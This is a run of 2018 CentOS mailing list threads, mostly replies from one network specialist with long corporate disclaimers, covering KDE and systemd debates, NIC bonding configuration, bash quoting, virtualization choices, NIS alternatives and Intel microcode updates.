Subject: [EXTERNAL] Re: [CentOS] Upping my game on web work

On 11/21/18 9:16 AM, Frank Cox wrote:
> On Wed, 21 Nov 2018 09:02:38 -0500
> Robert Moskowitz wrote:
>
>> What 'simple' web support tools do we have here?
> Libreoffice can create a html page from a word processor document.
>
> I've done that a few times where I do the basic layout with libreoffice and 
> then hand-edit the html to fine tune it.  But my web pages aren't usually 
> anything exceptionally fancy.

That might be interesting to try.  The one time I tried using Word to
create html was a disaster so much crude stuffed into the html and for what?

For years I use an xml editor (geany now adays) and code what I want.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024

[Leroy Tennison]

Interesting, I'm going to have to try something based on your comment, although 
I've been through a few distro releases /home has remained the same.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of mark 
Sent: Friday, November 2, 2018 3:19 PM
To: CentOS mailing list
Subject: [EXTERNAL] Re: [CentOS] Red Hat is Planning To Deprecate KDE on RHEL 
By 2024

Leroy Tennison wrote:
> I use KDE and they need to, quality is lacking, every time I boot up I
> get to discover where my icons will be located (and this has been going
> on through at least a couple of recvisions).  Locking doesn't help, even
> making the file I thought contained the positions immutable didn't help.
> I'm going to have to look at Trinity.
>
Odd, I've never had that problem. On the other hand, I *really* dislike
gnome. I think their target is 16 yr olds.

mark

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024

[Leroy Tennison]

I use KDE and they need to, quality is lacking, every time I boot up I get to 
discover where my icons will be located (and this has been going on through at 
least a couple of recvisions).  Locking doesn't help, even making the file I 
thought contained the positions immutable didn't help.  I'm going to have to 
look at Trinity.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Frank Cox 

Sent: Friday, November 2, 2018 3:02 PM
To: centos@centos.org
Subject: [EXTERNAL] [CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 
2024

https://www.theregister.co.uk/2018/11/02/rhel_deprecates_kde/

That's still several years in the future, of course.

I use Mate on all of my machines rather than Gnome or KDE and I'm sure
many of you fine folks do the same.

But it's interesting nonetheless.
--
MELVILLE THEATRE ~ Real D 3D Digital Cinema ~ www.melvilletheatre.com
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Would RHEL, CentOS, and Fedora Remain Open Source/Free Software After IBM Buys Red Hat for $34 Billion?

[Leroy Tennison]

If I heard/remember correctly, AT's UNIX was proprietary but they released it 
to academic institutions under NDA and were lax in enforcement.  We all know 
what happened. In this case it's obviously open source, we know what will 
happen if someone tries something.  My main concern is future development, will 
it remain open source.  My real fear is that a certain un-named company is 
going to feel pressured to buy Canonical.

My surprise is that no one is commenting on the price IMB is offering, a 60-70% 
premium, that in and of itself seems risky.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Japheth Cleaver 

Sent: Tuesday, October 30, 2018 11:15 PM
To: CentOS mailing list; Turritopsis Dohrnii Teo En Ming
Subject: [EXTERNAL] Re: [CentOS] Would RHEL, CentOS, and Fedora Remain Open 
Source/Free Software After IBM Buys Red Hat for $34 Billion?

On 10/30/2018 9:12 PM, Turritopsis Dohrnii Teo En Ming wrote:
> Why do you say so?
>
> On 10/31/18 12:44 AM, Turritopsis Dohrnii Teo En Ming wrote:
>> Good morning from Singapore,
>>
>> This is of paramount importance. Would Red Hat Enterprise Linux (RHEL), 
>> CentOS, and Fedora remain open source/free software after IBM buys Red Hat 
>> for $34 Billion?
> yes, because closing the code is the same as burning $34 Billion.

Think of it this way: A company specializing in 10 year support for an
operating environment is being bought by a company specializing in 25-30
year support for an operating environment. Enterprise Linux -- and thus
any derivative, like CentOS -- is not going away any time soon.

Fedora's value is far more in the technology aggregation (IMO) than
support. IBM isn't  and
thus I don't think the project is any danger, but Fedora would be
workably forkable if it really came down to it.

-jc

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] What are the differences between systemd and non-systemd Linux distros?

[Leroy Tennison]

This is indeed good news (that BSD isn't necessarily going to adopt systemd).


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Mark Rousell 

Sent: Wednesday, October 17, 2018 11:03 AM
To: centos@centos.org
Subject: [EXTERNAL] Re: [CentOS] What are the differences between systemd and 
non-systemd Linux distros?

On 17/10/2018 10:11, Anthony K wrote:
> It's starting to look as though the BSD camp may embrace systemd
> sooner rather than later:
>
> https://youtu.be/6AeWu1fZ7bY?t=1537 - I like this bit the most in that
> video!
>
> But do watch the entire presentation - good stuff.

I've listened to the video and no, it doesn't say any such thing. The
video does not say that BSD is going to use systemd.

What the speaker in the video certainly does point out is that service
and system management is a good thing overall and that there are better
ways of doing this than SysVinit. However, most people have not disputed
this.

A lot of people, including very many of those who greatly dislike
systemd, accept that SysVinit could and should be replaced or improved
upon. It's just that they do not think, for a variety of entirely
legitimate reasons, that systemd is the right software to do this. Even
on Devuan, for example, many people prefer to use init software other
than SysVinit.

The speaker says, amongst others thing, "what I find amusing
occasionally is that a lot of people who bitch about systemd, don't
bitch about launchd but I find that funny because systemd is launchd in
concept" but he should not be surprised. The people who complain about
systemd are doing so because (a) launchd is not being forced on them as
systemd is in practice (in their view), and/or (b) because they disagree
with systemd's specific architectural choices and/or their view of its
quality.

I should add that the speaker also massively over-simplifies opposition
to systemd on the basis that he incorrectly perceives it to be
opposition to change. He seems to ignore the fact that, as above, there
are substantive objections to the specific architecture and quality of
systemd, not merely objections to change with no deeper reason. He
further seems to ignore the fact that many people objecting to systemd
would nevertheless favour more modern system/service management.

The speaker goes on to give his reasons as to why bringing service and
system management to BSD is a good thing. As I point out above, many
people could well agree with this, even many people who dislike the
specific implementation of systemd on Linux.

To be clear, objections to systemd on Linux largely seem to me to be
about the specific implementation and perceived quality (and, dare I say
it, personalities), rather than either fear or change or objection to
modern system/service management.

The speaker explicitly points out: "What can we [BSD] get from systemd?
I'm not saying that we should adopt it [...] I don't think that trying
to directly adopt system is going to work for us". He then goes on to
point out why implementing a BSD kernel-based systems/service management
component that is inspired by some of systemd's advantages (or, to put
it another way, the advantages that any modern system/service management
facility could and should offer) would be a good thing. As I say, many
people, including many systemd-doubters or haters, would not object to this.

He is not, however, saying that systemd will be used on BSD. He's just
saying that the principles of system/service management are good ones
and that software other than systemd could implement them. And that's
exactly what a lot of systemd's critics say, too.


--
Mark Rousell




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] What are the differences between systemd and non-systemd Linux distros?

[Leroy Tennison]

Systemd is implemented in all the major distros, if you want to find ones that 
don't search for non-systemd.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Robert Moskowitz 

Sent: Tuesday, October 16, 2018 5:14 AM
To: CentOS mailing list; Turritopsis Dohrnii Teo En Ming
Subject: [EXTERNAL] Re: [CentOS] What are the differences between systemd and 
non-systemd Linux distros?

On 10/16/18 1:54 AM, Turritopsis Dohrnii Teo En Ming wrote:
> Good afternoon from Singapore,
>
> What are the differences between systemd and non-systemd Linux distros?
>
> Is systemd implemented in all the latest Linux distros?
>
> Please advise. Thank you.
>
>

My advice is to go and read up on the original design goals of systemd.
The information is out there.  We had this discussion here years ago
when we were staring and the impending transition.

Read the archives on the angst the change engendered and the adjustment
to the new methodology.

They say that the Internet never forgets, so you should be able to find
the original discussions and make your own judgment call.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Scroll bar arrows missing and behaviour change

[Leroy Tennison]

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of mark 
Sent: Friday, October 12, 2018 10:11 AM
To: CentOS mailing list
Subject: [EXTERNAL] Re: [CentOS] Scroll bar arrows missing and behaviour change

Valeri Galtsev wrote:
> On 10/12/18 8:40 AM, Leroy Tennison wrote:
>
>> And I thought it was a Kubuntu (Ubuntu with KDE desktop for those who
>> aren't familiar) thing!  Apparently it's a KDE thing.  I haven't
>> experienced the scrollbar aspect (or maybe I just haven't done what you
>> do) but my arrows are missing too.  I'm thinking this is a KDE Blasted
>> Ugly Gotcha (BUG).  BTW, if you haven't already discovered it, if you
>> position your cursor where the arrows used to be the "arrow
>> functionality" still exists (if you can get the cursor position just
>> right).  KDE now has invisible features...
>


> In the past as programmers we were taught more wisdom than today's
> "coders" have been: One of the rules of thumb was:
>
> Don't make any changes in [debugged] program unless they are absolutely
> necessary.
>
> On a similar note: who remembers netscape navigator (web browser)? It
> was pleasantly not changing its appearance and UI (User Interface) for
> ages. These days Firefox and thunderbird are being rushed with new
> releases. "Releases" full of security holes (take a look at CentOS update
> history: firefox security updates are the most often ones). As if
> they are aiming to beat everybody in version number (currently major
> version in 50th-60th). But they can not beat Microsoft who has a release:
> Windows 2000.
>

Oh, and they had to jump 40 numbers, to keep up with Google/Chrome,
because

Right, like WinCrap, *have* to change the user interface, because... oh,
that's right, they can sell more training. And the new UIs aren't as
thought out, or TRIED OUT WITH END USERS as the old one was. and they
don't care about some bugs... like t-bird "oh, you *can't* not want your
email when you hit  in the list, saving to your sent folder
isn't enough copies
>
> 
> [no beginning of rant tag, as I'm not certain where to put it]
>
> Valeri

 mark

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

> Right, like WinCrap, *have* to change the user interface, because... oh, 
> that's right, they can sell more training.

And I thought it was to give the appearance of "new and improved" when very 
little had really changed.  (No rant here, just a statement of fact :-) :-) :-) 
... )
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Scroll bar arrows missing and behaviour change

[Leroy Tennison]

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of mark 
Sent: Friday, October 12, 2018 9:01 AM
To: CentOS mailing list
Subject: [EXTERNAL] Re: [CentOS] Scroll bar arrows missing and behaviour change

Leroy Tennison wrote:
> And I thought it was a Kubuntu (Ubuntu with KDE desktop for those who
> aren't familiar) thing!  Apparently it's a KDE thing.  I haven't
> experienced the scrollbar aspect (or maybe I just haven't done what you
> do) but my arrows are missing too.  I'm thinking this is a KDE Blasted
> Ugly Gotcha (BUG).  BTW, if you haven't already discovered it, if you
> position your cursor where the arrows used to be the "arrow
> functionality" still exists (if you can get the cursor position just
> right).  KDE now has invisible features...
>
Please don't top post.

And I think it is only firefox. I run KDE on C7 - haven't looked on my C 6
at home - and it's only firefox 600.2esr, and there are no arrows, and no,
I can't put my cursur anywhere, it got to that part of the page. My
LibreOffice, my urxvt windows, and t-bird all have arrows.

And it's annoying - I miss something, and suddenly I'm at the bottom of
the page, instead of one window down.

 mark

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Outlook bit me again, sorry for the top post.  In my case the application is 
OpenOffice, I'll have to check LibreOffice and tbird.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Scroll bar arrows missing and behaviour change

[Leroy Tennison]

And I thought it was a Kubuntu (Ubuntu with KDE desktop for those who aren't 
familiar) thing!  Apparently it's a KDE thing.  I haven't experienced the 
scrollbar aspect (or maybe I just haven't done what you do) but my arrows are 
missing too.  I'm thinking this is a KDE Blasted Ugly Gotcha (BUG).  BTW, if 
you haven't already discovered it, if you position your cursor where the arrows 
used to be the "arrow functionality" still exists (if you can get the cursor 
position just right).  KDE now has invisible features...


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Gary Stainburn 

Sent: Friday, October 12, 2018 3:48 AM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] Scroll bar arrows missing and behaviour change

I have done some Googling on this but everything I've found appears to be at
least 2 years old and mostly refers to Gnome

TBH, I'm surprised nobody else has mentioned it - maybe it's only happened to
me.

At some point over the last few months the behaviour of the scroll bars
changed and I'm finding it very annoying.

Firstly, the arrows have vanished.

Secondly, when clicking on the scroll bar background either above or below the
drag bar instead of doing a page up or page down which is what it used to do
(and what I want it to continue doing) it now moves the scroll bar to that
absolute position, i.e. if I click on 75% down the scroll bar it jumps to 75%
of the document.

As this is happening in all apps I'm assuming it's something within KDE that
had changed.

I'm running an up-to-date Centos 7 x64 running the KDE desktop.

Anyone got suggestions on how I can get back the the old style (windows clone)
behaviour and appearance?
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Need help with Linux networking interfaces and NIC bonding

[Leroy Tennison]

I don't know if this is your situation or not but I have found in my bonding 
testing that failover can take what I consider to be an inordinate amount of 
time (as in up to 50 seconds).  Were you "patient" (possibly using an altered 
definition of the term) to see if ping would eventually reply.


Join us
at the 2018 Momentum User Conference!
Register
here
Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Sean Son 

Sent: Thursday, October 4, 2018 12:44 AM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] Need help with Linux networking interfaces and NIC 
bonding

Hello everyone

I am running into some strange issues when configuring networking
interfaces on my physical server running Centos 7.5. Let me give you an
overview of what's going on:

We have a physical server, running CentOS 7.5. This server has one 4 port
NIC and one 2 port NIC and a Dell IDRAC port.  The first port of the 4 port
NIC, em1, is used for Management traffic. The first port of the 2 port NIC,
is used for the second port in the  NIC bond, device p6p2.  The second
port on the 4 port NIC, device em2 is the first, port on the NIC bond.

These interfaces are using Static IPs.

Here is my /etc/sysconfig/network-scripts/ifcfg-em1 file. Please keep in
mind that I have changed the IPs and MAC addresses in the files for
security reasons:

ifcfg-em1:

TYPE="Ethernet"
PROXY_METHOD="none"
BROWSER_ONLY="no"
BOOTPROTO="none"
DEFROUTE="yes"
IPV4_FAILURE_FATAL="no"
IPV6INIT="yes"
IPV6_AUTOCONF="yes"
IPV6_DEFROUTE="yes"
IPV6_FAILURE_FATAL="no"
IPV6_ADDR_GEN_MODE="stable-privacy"
NAME="em1"
UUID="bbb2f9c2-141b-4a99-ab1e-328551aae612"
DEVICE="em1"
ONBOOT="yes"
IPADDR="192.168.56.50"
PREFIX="24"
GATEWAY="192.168.56.1"
DNS1="192.168.126.10"
DNS2="192.168.220.10"
IPV6_PRIVACY="no"
NM_CONTROLLED=no

as for the ifcfg-bond0 (the configuration file for the NIC bond, which is
bond0):

DEVICE=bond0
NAME=bond0
TYPE=Bond
ONBOOT=yes
BOOTPROTO=none
IPADDR=192.168.56.70
PREFIX=24
BONDING_MASTER=yes
BONDING_OPT="mode=1 miimon=100"
TYPE=Ethernet

and the ifcfg-slave1 configuration file, which is the first slave port for
the NIC bond, this corresponds to em2:

DEVICE=em2
HWADDR="c8:2f:87:fg:2a:31"
ONBOOT=yes
TYPE=Ethernet
BOOTPROTO=none
MASTER=bond0
SLAVE=yes

and the ifcfg-slave2 configuration file , which corresponds to the second
slave port for the NIC bond, which is interface p6p2:

DEVICE=p6p2
HWADDR="00:6a:d7:7c:e8:09"
BOOTPROTO=none
ONBOOT=yes
TYPE=Ethernet
MASTER=bond0
SLAVE=yes

I created a custom routing policy for the NIC bond, bond0. Here is the
configuration for the routing  policy:

route-bond0:


192.168.56.0/24 dev bond0 src 192.168.56.70 table t1
default via 192.168.56.1 dev bond0 table t1

and the rule-bond0 file:

table t1 from 192.168.56.70

as for the routing table:

Kernel IP routing table
Destination Gateway Genmask Flags Metric RefUse
Iface
0.0.0.0192.168.56.10.0.0.0 UG0  00 bond0
192.168.56.00.0.0.0 255.255.255.0   U 0  00
bond0
192.168.56.00.0.0.0 255.255.255.0   U 0  00 em1
169.254.0.0 0.0.0.0 255.255.0.0 U 1002   00 em1
169.254.0.0 0.0.0.0 255.255.0.0 U 1008   00
bond0



now here is the scenario I am dealing with:

This linux server is used for monitoring purposes. We have Nagios, Cacti
and other tools installed on it. There are a few things I have noticed and
I want help on:

1) Whenever I ping any of the devices on our network, from this server, the
traffic goes out from the management port. I do not want the traffic to go
out of the management port. I want it to go out through the active port of
the NIC bond.  How do I configure the networking so that all primary
network traffic flows to and from the NIC bonded interfaces?  I only wan

Re: [CentOS] Simple bash question

[Leroy Tennison]

Sounds like you're pretty constrained if you can't escape $plusmore so 
alternatives may not be possible either but, if possible, put the contents 
represented by $plusmore in a file and {read,redirect the output from} the file 
in myscript. Another option might be to put the contents represented by 
$plusmore in an environment variable and access that from myscript.  The only 
other option I can think of is to try a different scripting language (awk, 
perl, tcl, python, you-name-it) to try and get around the issue.


Join us
at the 2018 Momentum User Conference!
Register
here
Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Anand Buddhdev 

Sent: Friday, September 28, 2018 8:51 AM
To: CentOS mailing list; Jerry Geis
Subject: [EXTERNAL] Re: [CentOS] Simple bash question

On 28/09/2018 15:39, Jerry Geis wrote:

> I am calling a bash script and passing in somestring that includes a "$"
>
> myscript   "$plusmore"
>
> I want to assign in the myscript the $1 arg to something like
> MYTEXT="$1"
>
> when I do that I dont get what I'm expecting. if I do
> MYTEXT='$1'
> I still dont get what I'm expecting.
>
> On the first assignment of MYTEXT I do not want the "$" to be treated as a
> shell variable. I cannot find out how to do that.
>
> I do not have the option of escaping the call to myscipt "\$plusmore". I
> cannot do that.
>
> What am I missing.

You MUST escape the $ in plusmore. If you don't, the calling shell will
try to expand it, and replace it with whatever is in that variable. If
it's not defined, you'll get an empty string. All this happens *before*
myscript is even called.

I'll add that escaping the $ can be done in other ways. Instead of a
backslash, you can also do:

myscript '$plusmore'

Single quotes prevent variable expansion. However, if you are simply
unable to quote $plusmore in some way, then you're stuck.

Anand
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Centos 7.5 on Vmware

[Leroy Tennison]

I agree with Nataraj about kvm/qemu/libvirt, we have 10+ hypervisors running it 
and it meets our needs but none of them are particularly heavily loaded.  The 
only caution I would give is that there are occasions (mainly in the 
snapshot-associated arena) where the man page may simply say "do this" but, 
when you run the command on a distribution focusing on longer term support, you 
find it's not yet supported.  And there are areas where Red Hat flatly states 
that there are issues (snapshots of the operating environment rather that just 
disk images).  While this is true (for example, reverting to a snapshot reverts 
causes the system to have the date/time of the revert as well), we have still 
found value in these kinds of snapshots in a development environment.


Save the
Date 2018 Momentum User Conference
September 25 - 28, 2018
Athens, Georgia: The Classic Center
Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Gregory P. Ennis 

Sent: Sunday, July 1, 2018 9:53 PM
To: CentOS mailing list
Subject: [EXTERNAL] Re: [CentOS] Centos 7.5 on Vmware

On 06/28/2018 02:03 PM, Gregory P. Ennis wrote:
> Everyone,
>
> I am in the initial study phase of putting together a larger virtual
> server while using Centos 7.5 as the operating system of choice for
> the
>  individual virtual machines.
>
> How do you all like VMware for this, or what other software allows
> for
> the development of virtural servers that use Centos 7.5
>
> Thanks ahead of time for giving me a head start with your
> experiences
>

It would be helpful if you gave more details about what you were
looking
for?  Are you planning to run a bare metal hypervisor, or vmware under
Linux or windows?  What are you performance requirements?  IO? CPU?
What
will the VM's be used for?  Do guests requre a graphics console?

Various vmware products ranging from ESXI to vmware workstation are
very
popular. I've run several of them. They work.  I now use the Linux
included, kvm/qemu based Red Hat/CentOS virtualization and it meets my
needs very well for general testing/development, email server, web
server kind of stuff.  I also use this setup along with spice to run
test systems with various graphic GUI's.  I would not say that my virt
servers are very heavily loaded.  I have a Dell R210 running CentOS6
KVM/Qemu and a Dell XPS 9360 running Ubuntu 18.04 with kvm/qemu.

If you prefer fancy mangement GUI's over writing scripts and editing
config files, vmware might be better for you. kvm/qemu does include
virt-manager which is a fairly simply GUI to create and manage VM's,
but
the user interface is not as comprehensive as the interface for
managing
ESXi.

Red Hat does have their high end virtualization products, of which I
believe at least 1 is a bare metal hypervisor.  I have no personal
experience with those products, though if  client came to me with need,
I would examine and seriously consider the Redhat products.

One advantage to the kvm/qemu solution or possibly the redhat
virtualization product is more integrated support.  When I ran vmware,
I
used to run into situations where I wanted to beta test the newest
release of some random linux distribution only to find out that vmware
had not yet implemented support for the graphics driver or some other
new hardware feature being used in the OS that I was trying to test.
In
this way, kvm/qemu feels more integrated.  Like other software,
kvm/qemu
has bugs here and there, but overall, I'm very happy with it and I like
the price of using it under CentOS and Ubuntu.

I see clients all the time, go out and spend a fortune on huge vmware
clusters, that end up very lightly loaded and could easily be run on a
simple kvm/qemu server running under CentOS (or even one of the desktop
virtualization solutions) with a backup server for redundancy, so I
suggest to consider what your requirements really are.  You could
always
go with Redhat if you require support.

Nataraj

-
Nataraj,

Thank you very much for your comments.  I have not put 

Re: [CentOS] How insecure is NIS ? Possible alternatives ?

[Leroy Tennison]

I also looked into FreeIPA and the complexity is significant, at the time 
FreeIPA's DNS integration seemed to rely on a Fedora patch and I wasn't willing 
to introduce that into a production environment.  Does anyone know if this has 
changed?  Also, concerning alternatives, does anyone have experience with 
Shibboleth or OmniAuth?

-Original Message-
From: CentOS [mailto:centos-boun...@centos.org] On Behalf Of Leon Fauster
Sent: Monday, March 26, 2018 6:41 AM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] How insecure is NIS ? Possible alternatives ?


> Am 26.03.2018 um 11:59 schrieb Nicolas Kovacs :
> 
> Le 26/03/2018 à 10:28, isdtor a écrit :
>> In my opionion, there is a serious gap in this area. It's either NIS, 
>> simple, easy to setup yet insecure, or LDAP/FreeIPA/RH Id management 
>> server at a complexity at least one order of magnitude beyond NIS.
> 
> I gave FreeIPA a spin a while back. I installed it on a sandbox 
> server, and from what I recall, it pulled in a tsunami of 
> dependencies, and first thing it wanted to replace my Dnsmasq with 
> BIND... so I didn't look much further.

Quite time ago we had a stripped setup here working only with Openldap and PAM 
modules. LDAP with replication for redundancy, centralized communication with 
local CA and over TLS. It worked very well. The successor of such setup is SSSD 
for EL7 but the above should be still a feasible solution.

--
LF




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] In reply to: What is best way of managing isolated network environment?

[Leroy Tennison]

(Couldn't find the original request in my email but definitely have an idea). 

Set up an OpenVPN server on your network and create a client on the isolated 
network (set up to connect on boot), configure routing appropriately. You get 
to decide what subnet the VPN IP address is on, in this situation I recommend a 
static IP address for the client. From your network you connect to the OpenVPN 
IP address and connect to the rest of the isolated network from it (or set up 
multiple clients on the isolated network). 
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] /lib/firmware/microcode.dat update on CentOS 6

[Leroy Tennison]

What's amazing to me is, after "Intel Inside - don't divide" (their 486 
debacle), they didn't learn and have a better plan for addressing these kinds 
of things.

- Original Message -
From: "Chris Murphy" 
To: "centos" 
Sent: Wednesday, January 24, 2018 12:06:01 PM
Subject: Re: [CentOS] /lib/firmware/microcode.dat update on CentOS 6

On Tue, Jan 23, 2018 at 4:26 AM, Johnny Hughes  wrote:

>
> Here are a couple of posts for our reading pleasure:
>
> Intel recommends not installing the microcode now:
> http://intel.ly/2DsL9qz

Except this doesn't mention microcode at all. I can't even tell WTF
